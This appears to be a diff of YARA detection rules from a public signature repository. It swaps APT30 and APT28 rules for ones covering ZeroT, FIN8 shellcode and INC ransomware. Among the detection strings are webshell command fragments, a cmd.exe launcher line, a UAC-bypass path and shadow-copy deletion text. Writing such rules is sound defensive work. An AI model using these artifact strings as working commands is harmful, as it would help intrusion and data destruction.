-		id = "4d21f402-24da-5e38-9225-a1461e61802f"
-		date = "2015-04-13"
+		id = "2e3bb4bd-5e20-56e7-a82b-d717d83eaeeb"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L998-L1031"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L97-L111"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0a2d4e8583286a3f44b49dc902143ee1ea321d26275c6cbcd54876e94b8cd2a3"
+		logic_hash = "2de78012cc384211cef6c12817fd8cef9d93eef6de3197d0cfec64c1a8022ae3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "aaa5c64200ff0818c56ebe4c88bcc1143216c536"
-		hash1 = "cb4263cab467845dae9fae427e3bbeb31c6a14c2"
-		hash2 = "b69b95db8a55a050d6d6c0cba13d73975b8219ca"
-		hash3 = "5c29e21bbe8873778f9363258f5e570dddcadeb9"
-		hash4 = "d5cb07d178963f2dea2c754d261185ecc94e09d6"
-		hash5 = "626dcdd7357e1f8329e9137d0f9883f57ec5c163"
-		hash6 = "843997b36ed80d3aeea3c822cb5dc446b6bfa7b9"
+		hash1 = "a16078c6d09fcfc9d6ff7a91e39e6d72e2d6d6ab6080930e1e2169ec002b37d3"
 
 	strings:
-		$s0 = "%s\\%s.txt" fullword
-		$s1 = "\\ldsysinfo.txt"
-		$s4 = "(Extended Wansung)" fullword
-		$s6 = "Computer Name:" fullword
-		$s7 = "%s %uKB %04u-%02u-%02u %02u:%02u" fullword
-		$s8 = "ASSAMESE" fullword
-		$s9 = "BELARUSIAN" fullword
-		$s10 = "(PR China)" fullword
-		$s14 = "(French)" fullword
-		$s15 = "AdvancedServer" fullword
-		$s16 = "DataCenterServer" fullword
-		$s18 = "(Finland)" fullword
-		$s19 = "%s %04u-%02u-%02u %02u:%02u" fullword
-		$s20 = "(Chile)" fullword
+		$s1 = "jGetgQ|0h9=" fullword ascii
+		$s2 = "\\sfxrar32\\Release\\sfxrar.pdb"
 
 	condition:
-		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_APT30_Generic_2 : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_7 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample - from many files"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "60d7d661-50e8-5a9b-8366-eda8ff8ad9d4"
-		date = "2015-04-13"
+		id = "e9cdca86-84a8-5673-935c-c319b523674b"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L1032-L1087"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L113-L129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "56c9e58298c318b6dff2cce0ab896bb7bdd22429e6015b8fe72b8ad2f1f69d30"
+		logic_hash = "87ab6cd5c769e7e38bef807fa7d15af3a66fed8fdb7fed49fa62d87e1049ceb4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "aba8b9fa213e5e2f1f0404d13fecc20ea8651b57"
-		hash1 = "7f11f5c9475240e5dd2eea7726c9229972cffc1f"
-		hash2 = "94d3f91d1e50ecea729617729013c3d143bf2c3e"
-		hash3 = "7e516ec04f28c76d67b8111ddfe58bbd628362cc"
-		hash4 = "6b27bc0b0460b0a25b45d897ed4f399106c284d9"
-		hash5 = "6df5b4b3da0964153bad22fb1f69483ae8316655"
-		hash6 = "b68bce61dfd8763c3003480ba4066b3cb1ef126e"
-		hash7 = "cc124682246d098740cfa7d20aede850d49b6597"
-		hash8 = "1ef415bca310575944934fc97b0aa720943ba512"
-		hash9 = "0559ab9356dcc869da18b2c96f48b76478c472b3"
-		hash10 = "f15272042a4f9324ad5de884bd50f4072f4bdde3"
-		hash11 = "1d93d5f5463cdf85e3c22c56ed1381957f4efaac"
-		hash12 = "b6f1fb0f8a2fb92a3c60e154f24cfbca1984529f"
-		hash13 = "9967a99a1b627ddb6899919e32a0f544ea498b48"
-		hash14 = "95a3c812ca0ad104f045b26c483495129bcf37ca"
-		hash15 = "bde9a72b2113d18b4fa537cc080d8d8ba1a231e8"
-		hash16 = "ce1f53e06feab1e92f07ed544c288bf39c6fce19"
-		hash17 = "72dae031d885dbf492c0232dd1c792ab4785a2dc"
-		hash18 = "a2ccba46e40d0fb0dd3e1dba160ecbb5440862ec"
-		hash19 = "c8007b59b2d495029cdf5b7b8fc8a5a1f7aa7611"
-		hash20 = "9c6f470e2f326a055065b2501077c89f748db763"
-		hash21 = "af3e232559ef69bdf2ee9cd96434dcec58afbe5a"
-		hash22 = "e72e67ba32946c2702b7662c510cc1242cffe802"
-		hash23 = "8fc0b1618b61dce5f18eba01809301cb7f021b35"
-		hash24 = "6a8159da055dac928ba7c98ea1cdbe6dfb4a3c22"
-		hash25 = "47463412daf0b0a410d3ccbb7ea294db5ff42311"
-		hash26 = "e6efa0ccfddda7d7d689efeb28894c04ebc72be2"
-		hash27 = "43a3fc9a4fee43252e9a570492e4efe33043e710"
-		hash28 = "7406ebef11ca9f97c101b37f417901c70ab514b1"
-		hash29 = "53ed9b22084f89b4b595938e320f20efe65e0409"
+		hash1 = "fc2d47d91ad8517a4a974c4570b346b41646fac333d219d2f1282c96b4571478"
 
 	strings:
-		$s0 = "%s\\%s\\KB985109.log" fullword
-		$s1 = "%s\\%s\\KB989109.log" fullword
-		$s2 = "Opera.exe" fullword wide
-		$s3 = "%s:All online success on %u!" fullword
-		$s4 = "%s:list online success on %u!" fullword
-		$s5 = "%s:All online fail!" fullword
-		$s6 = "Copyright Opera Software 1995-" wide
-		$s7 = "%s:list online fail!" fullword
-		$s8 = "OnlineTmp.txt" fullword
-		$s9 = "Opera Internet Browser" fullword wide
-		$s12 = "Opera Software" fullword wide
-		$s15 = "Check lan have done!!!" fullword
-		$s16 = "List End." fullword
+		$s1 = "RasTls.dll" fullword ascii
+		$s2 = "RasTls.exe" fullword ascii
+		$s4 = "LOADER ERROR" fullword ascii
+		$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_4 : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_8 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2b246ae2-ec7d-5813-913e-729e4192da59"
-		date = "2015-04-13"
+		id = "f9a4f092-c699-5e91-9667-64ffe1b02bc1"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L1110-L1140"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L131-L147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d6a45baee2741c5ebb05fc3f17974a041cd37f665df1e67934b0928fc75f37c3"
+		logic_hash = "a1d5e72970919cd5c0493f8882cbc6fb1bb3c5b6517813a4022efd0028dfe728"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "bb390f99bfde234bbed59f6a0d962ba874b2396c"
-		hash1 = "b47e20ac5889700438dc241f28f4e224070810d2"
-		hash2 = "a9a50673ac000a313f3ddba55d63d9773b9f4143"
-		hash3 = "ac96d7f5957aef09bd983465c497de24c6d17a92"
+		hash1 = "4ef91c17b1415609a2394d2c6c353318a2503900e400aab25ab96c9fe7dc92ff"
 
 	strings:
-		$s0 = "del NetEagle_Scout.bat" fullword
-		$s1 = "NetEagle_Scout.bat" fullword
-		$s2 = "\\visit.exe"
-		$s3 = "\\System.exe"
-		$s4 = "\\System.dat"
-		$s5 = "\\ieupdate.exe"
-		$s6 = "GOTO ERROR" fullword
-		$s7 = ":ERROR" fullword
-		$s9 = "IF EXIST " fullword
-		$s10 = "ioiocn" fullword
-		$s11 = "SetFileAttribute" fullword
-		$s12 = "le_0*^il" fullword
-		$s13 = "le_.*^il" fullword
-		$s14 = "le_-*^il" fullword
+		$s1 = "/svchost.exe" fullword ascii
+		$s2 = "RasTls.dll" fullword ascii
+		$s3 = "20160620.htm" fullword ascii
+		$s4 = "/20160620.htm" fullword ascii
 
 	condition:
-		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5449 and filesize < 1000KB and 3 of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_5 : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_9 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e00a670e-cd95-515f-8109-219ce5121ba4"
-		date = "2015-04-13"
+		id = "e1c32993-409c-5a62-8239-cff99fb83a7f"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L1142-L1163"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L149-L163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a9d93d7dbf8c5e97ce77cf3fef4941a01c5b1c6bcee40c6f4ca7117d8aee289e"
+		logic_hash = "af4b85ef01c4fa21a2506369f3bc0f8eff6e95a4cfd494e1ea11a44d75bb024e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "cb4833220c508182c0ccd4e0d5a867d6c4e675f8"
-		hash1 = "dfc9a87df2d585c479ab02602133934b055d156f"
-		hash2 = "bf59d5ff7d38ec5ffb91296e002e8742baf24db5"
+		hash1 = "a685cf4dca6a58213e67d041bba637dca9cb3ea6bb9ad3eae3ba85229118bce0"
 
 	strings:
-		$s0 = "regsvr32 /s \"%ProgramFiles%\\Norton360\\Engine\\5.1.0.29\\ashelper.dll\"" fullword
-		$s1 = "name=\"ftpserver.exe\"/>" fullword
-		$s2 = "LiveUpdate.EXE" fullword wide
-		$s3 = "<description>FTP Explorer</description>" fullword
-		$s4 = "\\ashelper.dll"
-		$s5 = "LiveUpdate" fullword wide
+		$x1 = "nflogger.dll" fullword ascii
+		$s7 = "Zlh.exe" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_6 : FILE
+rule SIGNATURE_BASE_CN_APT_Zerot_Nflogger : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Chinese APT by Proofpoint ZeroT RAT  - file nflogger.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dfd104bd-daf4-593a-b161-61f43aec048c"
-		date = "2015-04-13"
+		id = "0d23f312-e3b6-5c23-855b-25ae54265512"
+		date = "2017-02-04"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L1165-L1186"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L165-L178"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ff7473e43e11e31fe6ad997009834f661a0120317e479184410456c99f72b613"
+		logic_hash = "dc9b19e3c4c321cb9f840ec9ff78bec9e4a075cc62ea2823d92a3fbd9f99cc07"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "b9aafb575d3d1732cb8fdca5ea226cebf86ea3c9"
-		hash1 = "2c5e347083b77c9ead9e75d41e2fabe096460bba"
-		hash2 = "5d39a567b50c74c4a921b5f65713f78023099933"
+		hash1 = "946adbeb017616d56193a6d43fe9c583be6ad1c7f6a22bab7df9db42e6e8ab10"
 
 	strings:
-		$s0 = "GetStar" fullword
-		$s1 = ".rdUaS" fullword
-		$s2 = "%sOTwp/&A\\L" fullword
-		$s3 = "a Encrt% Flash Disk" fullword
-		$s4 = "ypeAutoRuChec" fullword
-		$s5 = "NoDriveT" fullword
+		$x1 = "\\LoaderDll.VS2010\\Release\\" ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_7 : FILE
+rule SIGNATURE_BASE_CN_APT_Zerot_Extracted_Go : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Chinese APT by Proofpoint ZeroT RAT  - file Go.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bba40092-267b-5231-92f1-f222c9f888ee"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L1188-L1206"
+		id = "ba929e6d-4162-58e7-b8a8-bcb066b64522"
+		date = "2017-02-04"
+		modified = "2023-01-06"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L180-L203"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b5a272cbeb46be9b120acdbe12d795eddc05765777e4157d818c2b91ea7b782b"
+		logic_hash = "bf5e2d825e4bd63e94455ffb4013fa1088098a826390c1916c0aa50866588fcb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "2415f661046fdbe3eea8cd276b6f13354019b1a6"
-		hash1 = "e814914079af78d9f1b71000fee3c29d31d9b586"
-		hash2 = "0263de239ccef669c47399856d481e3361408e90"
+		hash1 = "83ddc69fe0d3f3d2f46df7e72995d59511c1bfcca1a4e14c330cb71860b4806b"
 
 	strings:
-		$s1 = "Xjapor_*ata" fullword
-		$s2 = "Xjapor_o*ata" fullword
-		$s4 = "Ouopai" fullword
+		$x1 = "%s\\cmd.exe /c %s\\Zlh.exe" fullword ascii
+		$x2 = "\\BypassUAC.VS2010\\Release\\" ascii
+		$s1 = "Zjdsf.exe" fullword ascii
+		$s2 = "SS32prep.exe" fullword ascii
+		$s3 = "windowsgrep.exe" fullword ascii
+		$s4 = "Sysdug.exe" fullword ascii
+		$s5 = "Proessz.exe" fullword ascii
+		$s6 = "%s\\Zlh.exe" fullword ascii
+		$s7 = "/C %s\\%s" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 7 of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_8 : FILE
+rule SIGNATURE_BASE_CN_APT_Zerot_Extracted_Mcutil : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Chinese APT by Proofpoint ZeroT RAT  - file Mcutil.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a6845222-0a3e-5327-a448-36e8d54362a5"
-		date = "2015-04-13"
+		id = "c887d36b-8aeb-54f1-a683-727561723238"
+		date = "2017-02-04"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L1207-L1232"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L205-L223"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2c240d2a35ce3d621d108d03d4e720ddf86e248047fb4dd7f9724e64020caa7f"
+		logic_hash = "edb6000fd65d6593bd94842e60ec099c5a652d10005f81d17063dba1a2e267d2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "b47e20ac5889700438dc241f28f4e224070810d2"
-		hash1 = "a9a50673ac000a313f3ddba55d63d9773b9f4143"
-		hash2 = "ac96d7f5957aef09bd983465c497de24c6d17a92"
+		hash1 = "266c06b06abbed846ebabfc0e683f5d20dadab52241bc166b9d60e9b8493b500"
 
 	strings:
-		$s0 = "Windows NT4.0" fullword
-		$s1 = "Windows NT3.51" fullword
-		$s2 = "%d;%d;%d;%ld;%ld;%ld;" fullword
-		$s3 = "%s %d.%d Build%d %s" fullword
-		$s4 = "MSAFD Tcpip [TCP/IP]" fullword
-		$s5 = "SQSRSS" fullword
-		$s8 = "WM_COMP" fullword
-		$s9 = "WM_MBU" fullword
-		$s11 = "WM_GRID" fullword
-		$s12 = "WM_RBU" fullword
+		$s1 = "LoaderDll.dll" fullword ascii
+		$s2 = "QageBox1USER" fullword ascii
+		$s3 = "xhmowl" fullword ascii
+		$s4 = "?KEYKY" fullword ascii
+		$s5 = "HH:mm:_s" fullword ascii
+		$s6 = "=licni] has maX0t" fullword ascii
 
 	condition:
-		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 90KB and 3 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_9 : FILE
+rule SIGNATURE_BASE_CN_APT_Zerot_Extracted_Zlh : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Chinese APT by Proofpoint ZeroT RAT - file Zlh.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cf259f8d-e0a9-579d-93e7-ec14d99faf81"
-		date = "2015-04-13"
+		id = "4c8b9a90-6cb3-5aba-a993-f73207341d0e"
+		date = "2017-02-04"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L1234-L1255"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L225-L241"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0b30c2f0bd654371bf3ac4f9d4e700e1544b62a6c0a072d506160c443fc5fe9d"
+		logic_hash = "26796f75a8302bd6c93eb3ea43d0491b86770b52bd11aad6e1e250d968a77004"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "00d9949832dc3533592c2ce06a403ef19deddce9"
-		hash1 = "27a2b981d4c0bb8c3628bfe990db4619ddfdff74"
-		hash2 = "05f66492c163ec2a24c6a87c7a43028c5f632437"
-		hash3 = "263f094da3f64e72ef8dc3d02be4fb33de1fdb96"
+		hash1 = "711f0a635bbd6bf1a2890855d0bd51dff79021db45673541972fe6e1288f5705"
 
 	strings:
-		$s0 = "%s\\%s\\$NtRecDoc$" fullword
-		$s1 = "%s(%u)%s" fullword
-		$s2 = "http://%s%s%s" fullword
-		$s3 = "1.9.1.17" fullword wide
-		$s4 = "(C)Firefox and Mozilla Developers, according to the MPL 1.1/GPL 2.0/LGPL" wide
+		$s1 = "nflogger.dll" fullword wide
+		$s2 = "%s %d: CreateProcess('%s', '%s') failed. Windows error code is 0x%08x" fullword ascii
+		$s3 = "_StartZlhh(): Executed \"%s\"" ascii
+		$s4 = "Executable: '%s' (%s) %i" fullword ascii
 
 	condition:
-		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_APT_PHP_DEWMODE_UNC2546_Feb21_1 : FILE
+rule SIGNATURE_BASE_Shellcode_Apihashing_FIN8_1
 {
 	meta:
-		description = "Detects DEWMODE webshells"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ea883f25-0e9b-5617-b05e-191a4a5c5a52"
-		date = "2021-02-22"
+		description = "Detects FIN8 Shellcode APIHashing"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "bca5601c-2998-545b-8dd0-ec3c861e6291"
+		date = "2021-03-16"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc2546_dewmode.yar#L2-L25"
+		reference = "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin8.yar#L1-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "86ce185f6350eb7485bce5bd31d91085fed25aa8ce78813e1c3c3dffbaae58ff"
+		logic_hash = "5d47119a588aa69b3e241618d6dbb9df6117a6751bbff39a1f95340bc26611a7"
 		score = 75
-		quality = 60
-		tags = "FILE"
-		hash1 = "2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7"
-		hash2 = "5fa2b9546770241da7305356d6427847598288290866837626f621d794692c1b"
+		quality = 85
+		tags = ""
 
 	strings:
-		$x1 = "<font size=4>Cleanup Shell</font></a>';" ascii fullword
-		$x2 = "$(sh /tmp/.scr)"
-		$x3 = "@system('sudo /usr/local/bin/admin.pl --mount_cifs=" ascii
-		$s1 = "target=\\\"_blank\\\">Download</a></td>\";" ascii
-		$s2 = ",PASSWORD 1>/dev/null 2>/dev/null');" ascii
-		$s3 = ",base64_decode('" ascii
-		$s4 = "include \"remote.inc\";" ascii
-		$s5 = "@system('sudo /usr/local" ascii
+		$APIHashing32bit1 = {81 F7 99 5D 52 69 81 F3 30 D7 00 AB}
+		$APIHashing32bit2 = {68 F2 55 03 88 68 65 19 6D 1E}
+		$APIHashing32bit3 = {68 9B 59 27 21 C1 E9 17 33 4C 24 10 68 37 5C 32 F4}
+		$APIHashing64bit1 = {49 BF 65 19 6D 1E F2 55 03 88 49 BE 37 5C 32 F4 9B 59 27 21}
+		$APIHashing64bit2 = {48 B8 99 5D 52 69 30 D7 00 AB}
 
 	condition:
-		uint16( 0 ) == 0x3f3c and filesize < 9KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
+		all of ( $APIHashing32bit* ) or all of ( $APIHashing64bit* )
 }
-rule SIGNATURE_BASE_APT28_CHOPSTICK : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_INC_Aug24 : FILE
 {
 	meta:
-		description = "Detects a malware that behaves like CHOPSTICK mentioned in APT28 report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "08bc4cc2-1844-5218-bb89-20a3ac70a951"
-		date = "2015-06-02"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/v3ebal"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28.yar#L10-L32"
+		description = "Detects INC ransomware and it's variants like Lynx"
+		author = "X__Junior"
+		id = "b776490b-f26a-55d9-bb26-ec3c617f070c"
+		date = "2024-08-08"
+		modified = "2024-12-12"
+		reference = "https://twitter.com/rivitna2/status/1701739812733014313"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_inc_ransomware.yar#L1-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f4db2e0881f83f6a2387ecf446fcb4a4c9f99808"
-		logic_hash = "750b2d5157856e0ffd840406eec601ded51ced7ccb20b577f336bbaf32681835"
-		score = 60
+		logic_hash = "335b92027c551d074015b830d137cf2fdee81d792cd7360f2499c83cc895fbbb"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "eaa0e773eb593b0046452f420b6db8a47178c09e6db0fa68f6a2d42c3f48e3bc"
+		hash2 = "1754c9973bac8260412e5ec34bf5156f5bb157aa797f95ff4fc905439b74357a"
 
 	strings:
-		$s0 = "jhuhugit.tmp" fullword ascii
-		$s8 = "KERNEL32.dll" fullword ascii
-		$s9 = "IsDebuggerPresent" fullword ascii
-		$s10 = "IsProcessorFeaturePresent" fullword ascii
-		$s11 = "TerminateProcess" fullword ascii
-		$s13 = "DeleteFileA" fullword ascii
-		$s15 = "GetProcessHeap" fullword ascii
-		$s16 = "!This program cannot be run in DOS mode." fullword ascii
-		$s17 = "LoadLibraryA" fullword ascii
+		$s1 = "tarting full encryption in" wide
+		$s2 = "oad hidden drives" wide
+		$s3 = "ending note to printers" ascii
+		$s4 = "uccessfully delete shadow copies from %c:/" wide
+		$op1 = { 33 C9 03 C6 83 C0 02 0F 92 C1 F7 D9 0B C8 51 E8 }
+		$op2 = { 8B 44 24 [1-4] 6A 00 50 FF 35 ?? ?? ?? ?? 50 FF 15}
+		$op3 = { 57 50 8D 45 ?? C7 45 ?? 00 00 00 00 50 6A 00 6A 00 6A 02 6A 00 6A 02 C7 45 ?? 00 00 00 00 FF D6 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 04 8B F8 8D 45 ?? 50 8D 45 ?? 50 FF 75 ?? 57 6A 02 6A 00 6A 02 FF D6 }
+		$op4 = { 6A FF 8D 4? ?? 5? 8D 4? ?? 5? 8D 4? ?? 5? 5? FF 15 ?? ?? ?? ?? 85 C0 }
+		$op5 = { 56 6A 00 68 01 00 10 00 FF 15 ?? ?? ?? ?? 8B F0 83 FE FF 74 ?? 6A 00 56 FF 15 ?? ?? ?? ?? 68 88 13 00 00 56 FF 15 ?? ?? ?? ?? 56 FF 15}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 722KB and all of them
+		uint16( 0 ) == 0x5A4D and ( 3 of ( $s* ) or 3 of ( $op* ) or ( 2 of ( $s* ) and 2 of ( $op* ) ) )
 }
-rule SIGNATURE_BASE_APT28_Sourface_Malware1 : FILE
+rule SIGNATURE_BASE_NK_Miner_Malware_Jan18_1 : FILE
 {
 	meta:
-		description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
-		author = "Florian Roth (Nextron Systems)"
-		id = "d4275b8d-384f-58b7-bac5-05fb7db659e2"
